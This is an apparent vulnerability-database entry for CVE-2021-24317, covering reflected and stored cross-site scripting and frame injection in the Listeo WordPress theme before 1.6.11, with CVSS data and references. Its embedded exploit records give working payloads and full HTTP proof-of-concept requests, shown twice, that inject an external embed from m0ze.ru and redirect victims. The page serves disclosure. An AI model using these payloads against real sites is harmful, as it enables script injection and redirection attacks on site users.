CVE-2021-24317

2021-06-01T14:15:00

Description

The Listeo WordPress theme before 1.6.11 did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues

Affected Software

CPE Name	Name	Version
purethemes:listeo	purethemes listeo	1.6.11

{"id": "CVE-2021-24317", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24317", "description": "The Listeo WordPress theme before 1.6.11 did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues", "published": "2021-06-01T14:15:00", "modified": "2021-06-11T18:24:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24317", "reporter": "contact@wpscan.com", "references": ["https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Listeo-WordPress-Theme-v1.6.10.txt", "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174"], "cvelist": ["CVE-2021-24317"], "immutableFields": [], "lastseen": "2022-03-23T14:51:42", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}], "rev": 4}, "score": {"value": 1.4, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-06-05T07:38:29", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1403454684438876162", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/QOvijzTuni?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1403454684438876162", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/QOvijzTuni?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1403454671080013833", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/JYlekmX1Uv?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1403454671080013833", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/JYlekmX1Uv?amp=1"}]}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}]}, "exploitation": null, "vulnersScore": 1.4}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "purethemes:listeo", "version": "1.6.11", "operator": "lt", "name": "purethemes listeo"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:purethemes:listeo:1.6.11:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.6.11", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Listeo-WordPress-Theme-v1.6.10.txt", "name": "https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Listeo-WordPress-Theme-v1.6.10.txt", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174", "name": "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}]}

{"wpexploit": [{"lastseen": "2021-08-23T12:24:38", "description": "The theme did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues \\- Unauthenticated Reflected XSS | Search query, vulnerable parameter(s): keyword_search and location_search \\- Authenticated Persistent XSS & XFS | Booking confirmation, vulnerable parameter(s): firstname, lastname, email, phone and message \\- Authenticated Persistent XSS & XFS | Personal messages: action=listeo_send_message&recipient;=&referral;=author_archive&message;=\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-16T00:00:00", "type": "wpexploit", "title": "Listeo < 1.6.11 - Multiple XSS & XFS vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24317"], "modified": "2021-05-17T07:01:32", "id": "WPEX-ID:704D8886-DF9E-4217-88D1-A72A71924174", "href": "", "sourceData": "### -- [ Payloads: ]\r\n\r\n[$] --!>\" autofocus onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//\"\r\n\r\n[$] <embed src=https://m0ze.ru/payload/xfsii.html>\r\n\r\n\r\n\r\n### -- [ PoC #1 | Unauthenticated Reflected XSS | Search query: ]\r\n\r\n[!] https://listeo.pro/listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing_category=&action=listeo_get_listings\r\n\r\n[!] GET /listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing_category=&action=listeo_get_listings HTTP/1.1\r\nHost: listeo.pro\r\n\r\n\r\n\r\n### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Booking confirmation: ]\r\n\r\n[!] POST /booking-confirmation/ HTTP/1.1\r\nHost: listeo.pro\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: https://listeo.pro/booking-confirmation/\r\nCookie: [user cookies]\r\n\r\nconfirmed=yessir&value=%7B%5C%22listing_type%5C%22%3A%5C%22rental%5C%22%2C%5C%22listing_id%5C%22%3A%5C%22578%5C%22%2C%5C%22date_start%5C%22%3A%5C%222021-09-07%5C%22%2C%5C%22date_end%5C%22%3A%5C%222021-09-10%5C%22%2C%5C%22adults%5C%22%3A%5C%221%5C%22%2C%5C%22services%5C%22%3A%5B%5D%7D&listing_id=578&coupon_code=&firstname=Ex%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&lastname=Mi%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&email=hatosoh945%40hrandod.com&phone=%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&message=%3C%2Ftextarea%3E%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E\r\n\r\n\r\n\r\n### -- [ PoC #3 | Authenticated Persistent XSS & XFS | Personal messages: ]\r\n\r\n[!] POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: listeo.pro\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://listeo.pro/author/m0ze/\r\nCookie: [user cookies]\r\n\r\naction=listeo_send_message&recipient=1506&referral=author_archive&message=%3C!--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E\r\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-08-23T12:24:38", "description": "The theme did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues \\- Unauthenticated Reflected XSS | Search query, vulnerable parameter(s): keyword_search and location_search \\- Authenticated Persistent XSS & XFS | Booking confirmation, vulnerable parameter(s): firstname, lastname, email, phone and message \\- Authenticated Persistent XSS & XFS | Personal messages: action=listeo_send_message&recipient;=&referral;=author_archive&message;=\n\n### PoC\n\n### -- [ Payloads: ] [$] --!>\" autofocus onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//\" [$] ### -- [ PoC #1 | Unauthenticated Reflected XSS | Search query: ] [!] https://listeo.pro/listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location;_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing;_category=&action;=listeo_get_listings [!] GET /listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location;_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing;_category=&action;=listeo_get_listings HTTP/1.1 Host: listeo.pro ### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Booking confirmation: ] [!] POST /booking-confirmation/ HTTP/1.1 Host: listeo.pro Content-Type: application/x-www-form-urlencoded Referer: https://listeo.pro/booking-confirmation/ Cookie: [user cookies] confirmed=yessir&value;=%7B%5C%22listing_type%5C%22%3A%5C%22rental%5C%22%2C%5C%22listing_id%5C%22%3A%5C%22578%5C%22%2C%5C%22date_start%5C%22%3A%5C%222021-09-07%5C%22%2C%5C%22date_end%5C%22%3A%5C%222021-09-10%5C%22%2C%5C%22adults%5C%22%3A%5C%221%5C%22%2C%5C%22services%5C%22%3A%5B%5D%7D&listing;_id=578&coupon;_code=&firstname;=Ex%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&lastname;=Mi%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&email;=hatosoh945%40hrandod.com&phone;=%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&message;=%3C%2Ftextarea%3E%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E ### -- [ PoC #3 | Authenticated Persistent XSS & XFS | Personal messages: ] [!] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: listeo.pro Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://listeo.pro/author/m0ze/ Cookie: [user cookies] action=listeo_send_message&recipient;=1506&referral;=author_archive&message;=%3C!--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-16T00:00:00", "type": "wpvulndb", "title": "Listeo < 1.6.11 - Multiple XSS & XFS vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24317"], "modified": "2021-05-17T07:01:32", "id": "WPVDB-ID:704D8886-DF9E-4217-88D1-A72A71924174", "href": "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

CVE-2021-24317

Description

Affected Software

Related